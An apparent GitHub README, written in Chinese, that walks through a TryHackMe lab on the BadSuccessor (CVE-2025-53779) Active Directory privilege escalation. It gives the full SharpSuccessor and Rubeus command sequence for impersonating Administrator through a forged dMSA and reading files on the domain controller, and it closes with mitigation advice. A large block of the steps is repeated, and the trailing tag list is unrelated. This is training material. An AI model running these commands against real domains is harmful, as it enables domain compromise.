Musa-xvi/Active-Directory-BadSuccessor
GitHub: Musa-xvi/Active-Directory-BadSuccessor
一个针对 CVE-2025-53779 BadSuccessor 漏洞的 TryHackMe 实战房间,演示如何通过滥用 Active Directory 委派托管服务账户实现权限提升。
Stars: 0 | Forks: 0
# Active-Directory-BadSuccessor
# 概述
在这个房间中,我们将探索 BadSuccessor 权限提升技术,这是一种滥用 Active Directory 中委派托管服务账户(dMSA)的漏洞。该攻击允许对 dMSA 对象拥有足够控制权的用户模拟另一个账户,并有可能获取 Domain Administrator 权限。
# 房间信息
**房间:** https://tryhackme.com/room/adbadsuccessor
**难度:** 中等
**日期:** 05/06/2026
**版本:** 1.0
**目标:** 演示如何滥用委派托管服务账户来提升权限并攻陷 Active Directory 环境。
**角色:** Terry Byte (tbyte)
**目的:** 评估新部署的 Active Directory 环境的安全性,并确定其是否存在易受 BadSuccessor 攻击的漏洞。
# 攻击路径
该攻击包含两个主要阶段:
1. 侦察。
2. 通过滥用 dMSA 进行权限提升
# 侦察
# 步骤 1 - 连接到目标机器
- 使用 RDP 连接到提供的 Windows 工作站:
```
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
```
- 通过身份验证后,打开 PowerShell。
# 步骤 2 - 导航至工作目录
- 移动到 PoC(概念验证)目录:
cd C:\PoC
- 验证内容:dir
# 步骤 3 - 获取枚举脚本
- 从 Akamai 的 BadSuccessor 仓库下载 PowerShell 脚本:
```
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
```
- 使用 Notepad 创建或编辑脚本:
notepad Get-BadSuccessorOUPermissions.ps1
- 粘贴内容并保存文件。
# 步骤 4 - 枚举 OU 权限
- 执行脚本:
```
.\Get-BadSuccessorOUPermissions.ps1
```
- 输出结果揭示了具有可能滥用委派托管服务账户权限的账户。
- 识别脚本返回的第三个账户。
- 该账户将在权限提升阶段使用。
# Windows 下的漏洞利用
# 步骤 1 - 创建恶意 dMSA
- 使用 SharpSuccessor 创建一个模拟 Administrator 账户的委派托管服务账户:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
**发生了什么?**
- 该工具创建了一个新的 dMSA 对象,并将其配置为继承 Administrator 账户。
- 这为权限提升奠定了基础。
# 步骤 2 - 请求 Kerberos TGT
- 使用 Rubeus 获取委派的票据授予票据(TGT):
.\Rubeus.exe tgtdeleg /nowrap
- 该命令返回 Base64 编码的 Kerberos 票据。
- 复制生成的票据。
# 步骤 3 - 模拟 dMSA 账户
- 使用委派的 TGT 请求作为新创建的 dMSA 账户的票据:
```
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:
```
**结果:**
为 dMSA 账户注入了一张新的 Kerberos 票据到内存中。
# 步骤 4 - 以 Administrator 身份请求服务票据
- 利用 dMSA 票据获取对在 Administrator 上下文中运行的服务的访问权限:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:
**结果:**
- CIFS 服务票据被加载到内存中。
- 该票据提供了对通常需要 Domain Administrator 权限才能访问的资源的访问权限。
# 步骤 5 - 访问 Administrator 桌面
- 通过浏览 Domain Controller 上的 Administrator 配置文件来验证提升的权限:
```
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
```
- 成功的目录列表确认了管理员级别的访问权限。
# 步骤 6 - 获取 Flag
- 读取存储在 Administrator 桌面上的 flag:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
- 成功获取 flag。
# 为什么 BadSuccessor 很重要
BadSuccessor 演示了委派托管服务账户如何在 Active Directory 环境中引入权限提升路径。Active Directory 是许多组织的身份支柱,影响 Kerberos 和账户委派的漏洞可能会带来严重的后果。
对 dMSA 对象拥有足够权限的攻击者可能会:
- 模拟特权用户
- 获取提升的 Kerberos 票据
- 访问敏感资源
- 将权限提升至 Domain Administrator
- 有可能攻陷整个 Active Directory 林
# 缓解建议
为了缓解 BadSuccessor (CVE-2025-53779),组织应及时应用 Microsoft 的安全更新,限制和审查 dMSA 权限,监控可疑的 Kerberos 活动,审计委派关系,并执行最小权限原则。定期审查 Active Directory 委派设置有助于识别并减少潜在的权限提升路径。
# 关键要点
本房间提供了以下方面的宝贵实操经验:
- Active Directory 权限提升
- 委派托管服务账户(dMSA)
- Kerberos 身份验证滥用
- Rubeus 票据操作
- SharpSuccessor 漏洞利用
- 后渗透验证技术
# 步骤 3 - 获取枚举脚本
- 从 Akamai 的 BadSuccessor 仓库下载 PowerShell 脚本:
```
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
```
- 使用 Notepad 创建或编辑脚本:
notepad Get-BadSuccessorOUPermissions.ps1
- 粘贴内容并保存文件。
# 步骤 4 - 枚举 OU 权限
- 执行脚本:
```
.\Get-BadSuccessorOUPermissions.ps1
```
- 输出结果揭示了具有可能滥用委派托管服务账户权限的账户。
- 识别脚本返回的第三个账户。
- 该账户将在权限提升阶段使用。
# Windows 下的漏洞利用
# 步骤 1 - 创建恶意 dMSA
- 使用 SharpSuccessor 创建一个模拟 Administrator 账户的委派托管服务账户:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
**发生了什么?**
- 该工具创建了一个新的 dMSA 对象,并将其配置为继承 Administrator 账户。
- 这为权限提升奠定了基础。
# 步骤 2 - 请求 Kerberos TGT
- 使用 Rubeus 获取委派的票据授予票据(TGT):
.\Rubeus.exe tgtdeleg /nowrap
- 该命令返回 Base64 编码的 Kerberos 票据。
- 复制生成的票据。
# 步骤 3 - 模拟 dMSA 账户
- 使用委派的 TGT 请求作为新创建的 dMSA 账户的票据:
```
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:
**结果:**
为 dMSA 账户注入了一张新的 Kerberos 票据到内存中。
# 步骤 4 - 以 Administrator 身份请求服务票据
- 利用 dMSA 票据获取对在 Administrator 上下文中运行的服务的访问权限:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:
**结果:**
- CIFS 服务票据被加载到内存中。
- 该票据提供了对通常需要 Domain Administrator 权限才能访问的资源的访问权限。
# 步骤 5 - 访问 Administrator 桌面
- 通过浏览 Domain Controller 上的 Administrator 配置文件来验证提升的权限:
```
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
```
- 成功的目录列表确认了管理员级别的访问权限。
# 步骤 6 - 获取 Flag
- 读取存储在 Administrator 桌面上的 flag:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
- 成功获取 flag。
# 为什么 BadSuccessor 很重要
BadSuccessor 演示了委派托管服务账户如何在 Active Directory 环境中引入权限提升路径。Active Directory 是许多组织的身份支柱,影响 Kerberos 和账户委派的漏洞可能会带来严重的后果。
对 dMSA 对象拥有足够权限的攻击者可能会:
- 模拟特权用户
- 获取提升的 Kerberos 票据
- 访问敏感资源
- 将权限提升至 Domain Administrator
- 有可能攻陷整个 Active Directory 林
# 缓解建议
为了缓解 BadSuccessor (CVE-2025-53779),组织应及时应用 Microsoft 的安全更新,限制和审查 dMSA 权限,监控可疑的 Kerberos 活动,审计委派关系,并执行最小权限原则。定期审查 Active Directory 委派设置有助于识别并减少潜在的权限提升路径。
# 关键要点
本房间提供了以下方面的宝贵实操经验:
- Active Directory 权限提升
- 委派托管服务账户(dMSA)
- Kerberos 身份验证滥用
- Rubeus 票据操作
- SharpSuccessor 漏洞利用
- 后渗透验证技术标签:Active Directory, AI合规, HTTP, Plaso, Terraform 安全, Web报告查看器, 协议分析, 安全, 数据展示, 权限提升, 红队, 超时处理